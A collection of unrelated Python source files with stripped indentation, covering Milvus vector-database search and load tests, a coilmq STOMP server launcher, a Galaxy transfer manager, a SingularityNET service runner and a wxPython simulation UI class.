vector1 = default_query
vector2 = gen_query_vectors(field_name, entities, top_k, nq=2)
expr = {
"must": [vector1, vector2]
}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
class TestSearchDSLBools(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
@pytest.mark.level(2)
def test_query_no_bool(self, connect, collection):
'''
method: build query without bool expr
expected: error raised
'''
entities, ids = init_data(connect, collection)
expr = {"bool1": {}}
query = expr
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_should_only_term(self, connect, collection):
'''
method: build query without must, with should.term instead
expected: error raised
'''
expr = {"should": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_should_only_vector(self, connect, collection):
'''
method: build query without must, with should.vector instead
expected: error raised
'''
expr = {"should": default_query["bool"]["must"]}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_must_not_only_term(self, connect, collection):
'''
method: build query without must, with must_not.term instead
expected: error raised
'''
expr = {"must_not": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_must_not_vector(self, connect, collection):
'''
method: build query without must, with must_not.vector instead
expected: error raised
'''
expr = {"must_not": default_query["bool"]["must"]}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_must_should(self, connect, collection):
'''
method: build query must, and with should.term
expected: error raised
'''
expr = {"should": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=True, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to test `search` function
# with invalid collection_name, or invalid query expr
******************************************************************
"""
class TestSearchInvalid(object):
"""
Test search collection with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_tag(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.level(2)
def test_search_with_invalid_collection(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
res = connect.search(collection_name, default_query)
@pytest.mark.level(1)
def test_search_with_invalid_tag(self, connect, collection):
tag = " "
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, partition_tags=tag)
@pytest.mark.level(2)
def test_search_with_invalid_field_name(self, connect, collection, get_invalid_field):
fields = [get_invalid_field]
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, fields=fields)
@pytest.mark.level(1)
def test_search_with_not_existed_field_name(self, connect, collection):
fields = [gen_unique_str("field_name")]
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, fields=fields)
"""
Test search collection with invalid query
"""
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_top_k(self, request):
yield request.param
@pytest.mark.level(1)
def test_search_with_invalid_top_k(self, connect, collection, get_top_k):
'''
target: test search function with an invalid top_k
method: search with invalid top_k values
expected: raise an error, and the connection is normal
'''
top_k = get_top_k
default_query["bool"]["must"][0]["vector"][field_name]["topk"] = top_k
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query)
"""
Test search collection with invalid search params
"""
@pytest.fixture(
scope="function",
params=gen_invaild_search_params()
)
def get_search_params(self, request):
yield request.param
@pytest.mark.level(2)
def test_search_with_invalid_params(self, connect, collection, get_simple_index, get_search_params):
'''
target: test search function with invalid search params
method: search with an invalid nprobe
expected: raise an error, and the connection is normal
'''
search_params = get_search_params
index_type = get_simple_index["index_type"]
if index_type in ["FLAT"]:
pytest.skip("skip in FLAT index")
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
query, vecs = gen_query_vectors(field_name, entities, top_k, 1, search_params=search_params["search_params"])
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_search_with_empty_params(self, connect, collection, args, get_simple_index):
'''
target: test search function with empty search params
method: search with empty params
expected: raise an error, and the connection is normal
'''
index_type = get_simple_index["index_type"]
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
if index_type == "FLAT":
pytest.skip("skip in FLAT index")
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
query, vecs = gen_query_vectors(field_name, entities, top_k, 1, search_params={})
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def check_id_result(result, id):
limit_in = 5
ids = [entity.id for entity in result]
if len(result) >= limit_in:
return id in ids[:limit_in]
else:
return id in ids
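# --- Illustrative reference distances (hypothetical helpers, not used by the tests above) ---
# The assertions above compare Milvus results against helpers such as l2(), ip(), jaccard(),
# hamming() and tanimoto() imported from the shared test utils; their real implementations
# live there. A minimal sketch of what such reference computations typically look like,
# assuming list/array inputs (names are prefixed to avoid shadowing the real helpers):
def _ref_l2(u, v):
    import numpy as np
    # Euclidean norm of the difference; the tests take np.sqrt() of the Milvus distance
    # before comparing, since Milvus reports squared L2.
    return float(np.linalg.norm(np.asarray(u) - np.asarray(v)))

def _ref_ip(u, v):
    import numpy as np
    # plain inner product; larger means more similar, hence the max() in the IP tests
    return float(np.dot(np.asarray(u), np.asarray(v)))

def _ref_jaccard(x, y):
    import numpy as np
    # Jaccard distance between two binary vectors (bitwise intersection over union)
    x, y = np.asarray(x, bool), np.asarray(y, bool)
    return 1.0 - np.bitwise_and(x, y).sum() / float(np.bitwise_or(x, y).sum())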
|
start.py
|
#!python
"""
Entrypoint for starting the application.
"""
import os
import logging
import time
import threading
import warnings
from contextlib import contextmanager
is_nt = os.name == 'nt'
if not is_nt:
import daemon as pydaemon
import pid
else:
pydaemon = pid = None
import click
from coilmq.config import config as global_config, init_config, init_logging, resolve_name
from coilmq.protocol import STOMP11
from coilmq.topic import TopicManager
from coilmq.queue import QueueManager
from coilmq.server.socket_server import ThreadedStompServer
__authors__ = ['"Hans Lellelid" <hans@xmpl.org>']
__copyright__ = "Copyright 2009 Hans Lellelid"
__license__ = """Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
logger = logging.getLogger(__name__)
def server_from_config(config=None, server_class=None, additional_kwargs=None):
"""
Gets a configured L{coilmq.server.StompServer} from specified config.
If `config` is None, global L{coilmq.config.config} var will be used instead.
The `server_class` and `additional_kwargs` are primarily hooks for using this method
from a testing environment.
@param config: A C{ConfigParser.ConfigParser} instance with loaded config values.
@type config: C{ConfigParser.ConfigParser}
@param server_class: Which class to use for the server. (This doesn't come from config currently.)
@type server_class: C{class}
@param additional_kwargs: Any additional args that should be passed to class.
@type additional_kwargs: C{list}
@return: The configured StompServer.
@rtype: L{coilmq.server.StompServer}
"""
global global_config
if not config:
config = global_config
queue_store_factory = resolve_name(config.get('coilmq', 'qstore.factory'))
subscriber_scheduler_factory = resolve_name(config.get(
'coilmq', 'scheduler.subscriber_priority_factory'))
queue_scheduler_factory = resolve_name(config.get(
'coilmq', 'scheduler.queue_priority_factory'))
if config.has_option('coilmq', 'auth.factory'):
authenticator_factory = resolve_name(
config.get('coilmq', 'auth.factory'))
authenticator = authenticator_factory()
else:
authenticator = None
server = ThreadedStompServer((config.get('coilmq', 'listen_addr'), config.getint('coilmq', 'listen_port')),
queue_manager=QueueManager(store=queue_store_factory(),
subscriber_scheduler=subscriber_scheduler_factory(),
queue_scheduler=queue_scheduler_factory()),
topic_manager=TopicManager(),
authenticator=authenticator,
protocol=STOMP11)
logger.info("Created server:%r" % server)
return server
def context_serve(context, configfile, listen_addr, listen_port, logfile,
debug, daemon, uid, gid, pidfile, umask, rundir):
"""
Takes a context object, which implements the __enter__/__exit__ "with" interface
and starts a server within that context.
This method is a refactored single-place for handling the server-run code whether
running in daemon or non-daemon mode. It is invoked with a dummy (passthrough)
context object for the non-daemon use case.
The remaining parameters mirror the command-line options (configfile, listen_addr, listen_port, logfile, debug, daemon, uid, gid, pidfile, umask, rundir).
@param context: The context object that implements __enter__/__exit__ "with" methods.
@type context: C{object}
@raise Exception: Any underlying exception will be logged but then re-raised.
@see: server_from_config()
"""
global global_config
server = None
try:
with context:
# There's a possibility here that init_logging() will throw an exception. If it does,
# AND we're in a daemon context, then we're not going to be able to do anything with it.
# We've got no stderr/stdout here, and so (to my knowledge) no reliable, cross-platform
# way to display errors.
level = logging.DEBUG if debug else logging.INFO
init_logging(logfile=logfile, loglevel=level,
configfile=configfile)
server = server_from_config()
logger.info("Stomp server listening on %s:%s" % server.server_address)
if debug:
poll_interval = float(global_config.get(
'coilmq', 'debug.stats_poll_interval'))
if poll_interval: # Setting poll_interval to 0 effectively disables it.
def diagnostic_loop(server):
log = logger
while True:
log.debug(
"Stats heartbeat -------------------------------")
store = server.queue_manager.store
for dest in store.destinations():
log.debug("Queue %s: size=%s, subscribers=%s" % (
dest, store.size(dest), server.queue_manager.subscriber_count(dest)))
# TODO: Add number of subscribers?
time.sleep(poll_interval)
diagnostic_thread = threading.Thread(
target=diagnostic_loop, name='DiagnosticThread', args=(server,))
diagnostic_thread.daemon = True
diagnostic_thread.start()
server.serve_forever()
except (KeyboardInterrupt, SystemExit):
logger.info("Stomp server stopped by user interrupt.")
raise SystemExit()
except Exception as e:
logger.error("Stomp server stopped due to error: %s" % e)
logger.exception(e)
raise SystemExit()
finally:
if server:
server.server_close()
def _main(config=None, host=None, port=None, logfile=None, debug=None,
daemon=None, uid=None, gid=None, pidfile=None, umask=None, rundir=None):
# Note that we must initialize the configuration before we enter the context
# block; however, we _cannot_ initialize logging until we are in the context block
# (so we defer that until the context_serve call.)
init_config(config)
if host is not None:
global_config.set('coilmq', 'listen_addr', host)
if port is not None:
global_config.set('coilmq', 'listen_port', str(port))
if daemon and is_nt:
warnings.warn("Daemon context is not available for NT platform")
# In non-daemon mode, we use a dummy (pass-through) context object
# so we can use the same run-server code as the daemon version.
context = pydaemon.DaemonContext(uid=uid,
gid=gid,
pidfile=pid.PidFile(pidname=pidfile) if pidfile else None,
umask=int(umask, 8),
working_directory=rundir) if daemon and pydaemon else contextmanager(lambda: (yield))()
context_serve(context, config, host, port, logfile, debug, daemon, uid, gid, pidfile, umask, rundir)
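# A minimal sketch (illustrative, not part of the CLI below) of the pass-through context used
# above: contextmanager(lambda: (yield)) builds a generator-based no-op context manager, so
# context_serve() runs the same "with context:" code path whether or not a real
# daemon.DaemonContext is available.
def _null_context_example():
    with contextmanager(lambda: (yield))():
        return "ran inside a no-op context"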
@click.command()
@click.option("-c", "--config", help="Read configuration from FILE. (CLI options override config file.)", metavar="FILE")
@click.option("-b", "--host", help="Listen on specified address (default 127.0.0.1)", metavar="ADDR")
@click.option("-p", "--port", help="Listen on specified port (default 61613)", type=int, metavar="PORT")
@click.option("-l", "--logfile", help="Log to specified file (unless logging configured in config file).", metavar="FILE")
@click.option("--debug", default=False, help="Sets logging to debug (unless logging configured in config file).")
@click.option("-d", "--daemon", default=False, help="Run server as a daemon (default False).")
@click.option("-u", "--uid", help="The user/UID to use for daemon process.", metavar="UID")
@click.option("-g", "--gid", help="The group/GID to use for daemon process.", metavar="GID")
@click.option("--pidfile", help="The PID file to use.", metavar="FILE")
@click.option("--umask", help="Umask (octal) to apply for daemonized process.", metavar="MASK")
@click.option('--rundir', help="The working directory to use for the daemonized process (default /).", metavar="DIR")
def main(config, host, port, logfile, debug, daemon, uid, gid, pidfile, umask, rundir):
"""
Main entry point for running a socket server from the commandline.
This method will read in options from the commandline and call the L{config.init_config} method
to get everything set up. Then, depending on whether daemon mode was specified or not,
the process may be forked (or not) and the server will be started.
"""
_main(**locals())
if __name__ == '__main__':
try:
main()
except (KeyboardInterrupt, SystemExit):
pass
except Exception as e:
logger.error("Server terminated due to error: %s" % e)
logger.exception(e)
|
transfer_manager.py
|
"""
Manage transfers from arbitrary URLs to temporary files. Socket interface for
IPC with multiple process configurations.
"""
import json
import logging
import os
import socket
import subprocess
import threading
from six.moves import shlex_quote
from galaxy.util import listify, sleeper
from galaxy.util.json import jsonrpc_request, validate_jsonrpc_response
log = logging.getLogger(__name__)
class TransferManager(object):
"""
Manage simple data transfers from URLs to temporary locations.
"""
def __init__(self, app):
self.app = app
self.sa_session = app.model.context.current
self.command = ['python', os.path.abspath(os.path.join(os.getcwd(), 'scripts', 'transfer.py'))]
if app.config.get_bool('enable_job_recovery', True):
# Only one Galaxy server process should be able to recover jobs! (otherwise you'll have nasty race conditions)
self.running = True
self.sleeper = sleeper.Sleeper()
self.restarter = threading.Thread(target=self.__restarter)
self.restarter.start()
def new(self, path=None, **kwd):
if 'protocol' not in kwd:
raise Exception('Missing required parameter "protocol".')
protocol = kwd['protocol']
if protocol in ['http', 'https']:
if 'url' not in kwd:
raise Exception('Missing required parameter "url".')
elif protocol == 'scp':
# TODO: add more checks here?
if 'sample_dataset_id' not in kwd:
raise Exception('Missing required parameter "sample_dataset_id".')
if 'file_path' not in kwd:
raise Exception('Missing required parameter "file_path".')
transfer_job = self.app.model.TransferJob(state=self.app.model.TransferJob.states.NEW, params=kwd)
self.sa_session.add(transfer_job)
self.sa_session.flush()
return transfer_job
def run(self, transfer_jobs):
"""
This method blocks, so if invoking the transfer manager ever starts
taking too long, we should move it to a thread. However, the
transfer_manager will either daemonize or return after submitting to a
running daemon, so it should be fairly quick to return.
"""
transfer_jobs = listify(transfer_jobs)
printable_tj_ids = ', '.join([str(tj.id) for tj in transfer_jobs])
log.debug('Initiating transfer job(s): %s' % printable_tj_ids)
# Set all jobs running before spawning, or else updating the state may
# clobber a state change performed by the worker.
for tj in transfer_jobs:
    tj.state = tj.states.RUNNING
self.sa_session.add_all(transfer_jobs)
self.sa_session.flush()
for tj in transfer_jobs:
# The transfer script should daemonize fairly quickly - if this is
# not the case, this process will need to be moved to a
# non-blocking method.
cmd = self.command + [tj.id]
log.debug('Transfer command is: %s', ' '.join(map(shlex_quote, cmd)))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
p.wait()
output = p.stdout.read(32768)
if p.returncode != 0:
log.error('Spawning transfer job failed: %s: %s' % (tj.id, output))
tj.state = tj.states.ERROR
tj.info = 'Spawning transfer job failed: %s' % output.splitlines()[-1]
self.sa_session.add(tj)
self.sa_session.flush()
def get_state(self, transfer_jobs, via_socket=False):
transfer_jobs = listify(transfer_jobs)
rval = []
for tj in transfer_jobs:
if via_socket and tj.state not in tj.terminal_states and tj.socket:
try:
request = jsonrpc_request(method='get_state', id=True)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect(('localhost', tj.socket))
sock.send(json.dumps(request))
response = sock.recv(8192)
valid, response = validate_jsonrpc_response(response, id=request['id'])
if not valid:
# No valid response received, make some pseudo-json-rpc
raise Exception(dict(code=128, message='Did not receive valid response from transfer daemon for state'))
if 'error' in response:
# Response was valid but Request resulted in an error
raise Exception(response['error'])
else:
# Request was valid
response['result']['transfer_job_id'] = tj.id
rval.append(response['result'])
except Exception as e:
# State checking via the transfer daemon failed, just
# return the state from the database instead. Callers can
# look for the 'error' member of the response to see why
# the check failed.
self.sa_session.refresh(tj)
error = e.args
if not isinstance(error, dict):
error = dict(code=256, message='Error connecting to transfer daemon', data=str(e))
rval.append(dict(transfer_job_id=tj.id, state=tj.state, error=error))
else:
self.sa_session.refresh(tj)
rval.append(dict(transfer_job_id=tj.id, state=tj.state))
for tj_state in rval:
if tj_state['state'] in self.app.model.TransferJob.terminal_states:
log.debug('Transfer job %s is in terminal state: %s' % (tj_state['transfer_job_id'], tj_state['state']))
elif tj_state['state'] == self.app.model.TransferJob.states.PROGRESS and 'percent' in tj_state:
log.debug('Transfer job %s is %s%% complete' % (tj_state['transfer_job_id'], tj_state['percent']))
if len(rval) == 1:
return rval[0]
return rval
def __restarter(self):
log.info('Transfer job restarter starting up...')
while self.running:
dead = []
self.sa_session.expunge_all() # our session is threadlocal so this is safe.
for tj in self.sa_session.query(self.app.model.TransferJob) \
.filter(self.app.model.TransferJob.state == self.app.model.TransferJob.states.RUNNING):
if not tj.pid:
continue
# This will only succeed if the process exists and is owned by the
# user running Galaxy (unless that user is root, in which case it
# can be owned by anyone - but you're not running Galaxy as root,
# right?). This is not guaranteed proof that the transfer is alive
# since another process may have assumed the original process' PID.
# But that will only cause the transfer to not restart until that
# process dies, which hopefully won't be too long from now... If
# it becomes a problem, try to talk to the socket a few times and
# restart the transfer if socket communication fails repeatedly.
try:
os.kill(tj.pid, 0)
except OSError:
self.sa_session.refresh(tj)
if tj.state == tj.states.RUNNING:
log.error('Transfer job %s is marked as running but pid %s appears to be dead.' % (tj.id, tj.pid))
dead.append(tj)
if dead:
self.run(dead)
self.sleeper.sleep(30)
log.info('Transfer job restarter shutting down...')
def shutdown(self):
self.running = False
self.sleeper.wake()
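# Illustrative helper (not part of Galaxy): the liveness probe used by __restarter() above.
# Sending signal 0 performs the existence/permission checks without delivering a signal, so
# it answers "does a process with this pid, which we are allowed to signal, still exist?".
def _pid_is_alive(pid):
    try:
        os.kill(pid, 0)
    except OSError:
        return False
    return True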
|
run_object_detection_service.py
|
import pathlib
import subprocess
import time
import os
import sys
import logging
import threading
from service import registry
logging.basicConfig(level=10, format="%(asctime)s - [%(levelname)8s] - %(name)s - %(message)s")
log = logging.getLogger("run_object_detection")
def main():
root_path = pathlib.Path(__file__).absolute().parent
# All services modules go here
service_modules = ["service.object_detection_service"]
# Removing all previous snetd .db file
os.system("rm snetd*.db")
# Call for all the services listed in service_modules
start_all_services(root_path, service_modules)
# Infinite loop to serve the services
while True:
try:
time.sleep(1)
except Exception as e:
log.error(e)
exit(0)
def start_all_services(cwd, service_modules):
"""
Loop through all service_modules and start them.
For each one, an instance of Daemon "snetd" is created.
snetd will start with configs from "snetd.config.json"
"""
try:
for i, service_module in enumerate(service_modules):
service_name = service_module.split(".")[-1]
log.info("Launching {} on port {}".format(str(registry[service_name]), service_module))
process_th = threading.Thread(target=start_service, args=(cwd, service_module))
# Bind the thread with the main() to abort it when main() exits.
process_th.daemon = True
process_th.start()
except Exception as e:
log.error(e)
return False
return True
def start_service(cwd, service_module):
"""
Starts SNET Daemon ("snetd") and the python module of the service
at the passed gRPC port.
"""
start_snetd(str(cwd))
service_name = service_module.split(".")[-1]
grpc_port = registry[service_name]["grpc"]
subprocess.Popen(
[sys.executable, "-m", service_module, "--grpc-port", str(grpc_port)],
cwd=str(cwd))
def start_snetd(cwd):
"""
Starts the Daemon "snetd":
"""
cmd = ["snetd", "serve"]
subprocess.Popen(cmd, cwd=str(cwd))
return True
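# Illustrative assumption (not the real service.registry): the registry imported above is
# expected to map each service's short module name to its ports; start_service() reads the
# "grpc" entry when spawning the service module. A hypothetical shape:
_example_registry = {"object_detection_service": {"grpc": 7003}}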
if __name__ == "__main__":
main()
|
AbstractUI.py
|
import wx
import multiprocessing as mp
import time
from . import process
import abc
#define an abstract UI class which contains code to interact with server.
#Note that each demo MUST derive its own subclass of this class (in *demo_name*_UI.py), and modify existing/add new methods to customise the GUI to the demo's needs.
class AbstractUI(wx.Frame):
#__metaclass__ = abc.ABCMeta
#@abc.abstractmethod
def __init__(self,parent,title,demo,servercomm):
wx.Frame.__init__(self,parent,title=title)
self.demo=demo
self.servercomm=servercomm
#bind closing the window to the OnClose() method (kills the process and deletes the simulation from the server)
self.Bind(wx.EVT_CLOSE,self.OnClose)
#timer which periodically checks the process to see if there is new data available etc.
self.timer=wx.Timer(self)
self.Bind(wx.EVT_TIMER,self.TimerCallback,self.timer)
#default refreshrate to 0.5s (This may need to be updated on a per-demo basis)
self.refreshrate=0.5
#start the simulation
#@abc.abstractmethod
def StartSim(self,config):
self.servercomm.StartSim(config) #pass in config file
(self.pipemain,pipeprocess)=mp.Pipe() #create pipe for sending data between processes
self.frameno=mp.Value('i',0) #frameno is an integer, initialised to 0
self.nfiles=mp.Value('i',0) #number of files available on server
self.getdata=mp.Value('b',False) #flag to tell process to get new data
self.newdata=mp.Value('b',False) #flag saying if process has new data ready
self.finished=mp.Value('b',False) #flag to tell process that we are done
self.simfinished=mp.Value('b',False) #flag for process to tell ui that the simulation is finished
#kick off process
self.p=mp.Process(target=process.process,args=(self.frameno,self.nfiles,self.getdata,self.newdata,pipeprocess,self.demo,self.servercomm,self.finished,self.refreshrate,self.simfinished))
self.p.start() #start off process
self.CurrentFrame=0
#Start timer (argument to .Start is in milliseconds)
self.timer.Start(self.refreshrate*1000)
#stop the simulation
#@abc.abstractmethod
def StopSim(self):
print("Deleting Simulation")
self.p.terminate()
time.sleep(0.5)
self.servercomm.DeleteSim()
self.nfiles.value=0
self.CurrentFrame=0
self.timer.Stop()
#function that checks for new data from the process. If so, it downloads it and (if required) renders it
#@abc.abstractmethod
def TimerCallback(self,e):
if self.servercomm.IsStarted():
#initialise the GetLatestFrame flag on first use
if not hasattr(self, "GetLatestFrame"):
    self.GetLatestFrame = False
if self.newdata.value: #if new data is available
if self.getdata.value: #if we have requested new data
dto=self.pipemain.recv() #get the dto from process
self.CurrentFrame=self.frameno.value #set the current frame number to the one the process has just read in
if self.playing: #increment frame number by 1 and tell process to fetch it
if self.GetLatestFrame:
self.frameno.value=-1
else:
self.frameno.value += 1
self.getdata.value=True
else: #we don't need any more data
self.getdata.value=False
self.pipemain.send(1)#read receipt
self.demo.RenderFrame(self,dto) #render the data
else: #we didn't request new data (likely someone hit 'pause' after a request for new data was put into the process). We don't need/want this data, so read it into a dummy array then do nothing
dummydata=self.pipemain.recv() #read data into dummy array and do nothing
self.pipemain.send(1)
#Make sure any background processes are killed off when the main window is closed
#@abc.abstractmethod
def OnClose(self,evt):
print("Exiting Program...")
try:
self.p.terminate()
print("Terminating processes")
except Exception:
print("No process to be terminated")
if self.servercomm.IsStarted():
print("Deleting simulation temp files")
self.servercomm.DeleteSim()
self.Destroy()
print("Done!")
|
test_load_collection.py
|
import pdb
import pytest
from utils import *
from constants import *
uid = "load_collection"
field_name = default_float_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": default_top_k, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
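# default_single_query above is the single-vector search request reused by the tests
# below: one "vector" clause on the default float vector field, L2 metric,
# topk=default_top_k and nprobe=10 as the search parameters.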
class TestLoadCollection:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_after_index(self, connect, collection, get_simple_index):
'''
target: test load collection, after index created
method: insert and create index, load collection with correct params
expected: no error raised
'''
connect.insert(collection, default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.level(2)
def test_load_collection_after_index_binary(self, connect, binary_collection, get_binary_index):
'''
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
'''
ids = connect.insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
get_binary_index["metric_type"] = metric_type
connect.drop_index(binary_collection, default_binary_vec_field_name)
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, default_binary_vec_field_name)
assert index == get_binary_index
connect.load_collection(binary_collection)
connect.release_collection(binary_collection)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_empty_collection(self, connect, collection):
'''
target: test load collection
method: no entities in collection, load collection with correct params
expected: load success
'''
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.level(2)
def test_load_collection_dis_connect(self, dis_connect, collection):
'''
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.load_collection(collection)
@pytest.mark.level(2)
def test_release_collection_dis_connect(self, dis_connect, collection):
'''
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.release_collection(collection)
@pytest.mark.level(2)
def test_load_collection_not_existed(self, connect, collection):
collection_name = gen_unique_str(uid)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.level(2)
def test_release_collection_not_existed(self, connect, collection):
collection_name = gen_unique_str(uid)
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_not_load(self, connect, collection):
"""
target: test release collection without load
method: insert entities and flush, then release the collection without loading it
expected: raise exception
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_after_load_release(self, connect, collection):
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_collection(collection)
connect.load_collection(collection)
def test_load_collection_repeatedly(self, connect, collection):
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.load_collection(collection)
@pytest.mark.level(2)
def test_load_release_collection(self, connect, collection):
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.insert(collection_name, default_entities)
connect.flush([collection_name])
connect.load_collection(collection_name)
connect.release_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.drop_collection(collection)
try:
connect.release_collection(collection)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_without_flush(self, connect, collection):
"""
target: test load collection without flush
method: insert entities without flush, then load collection
expected: load collection failed
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.load_collection(collection)
# TODO
def _test_load_collection_larger_than_memory(self):
"""
target: test load collection when memory less than collection size
method: load a collection whose size exceeds the available memory (approach not yet determined)
expected: raise exception
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_release_part_partitions(self, connect, collection):
"""
target: test release part partitions after load collection
method: load collection and release part partitions
expected: released partitions search empty
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
connect.search(collection, default_single_query, partition_names=[default_tag])
res = connect.search(collection, default_single_query, partition_names=[default_partition_name])
assert len(res[0]) == default_top_k
def test_load_collection_release_all_partitions(self, connect, collection):
"""
target: test release all partitions after load collection
method: load collection and release all partitions
expected: search empty
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_partition_name, default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partitions_release_collection(self, connect, collection):
"""
target: test release collection after load partitions
method: insert entities into partitions, search empty after load partitions and release collection
expected: search result empty
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
# assert len(res[0]) == 0
class TestReleaseAdvanced:
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_during_searching(self, connect, collection):
"""
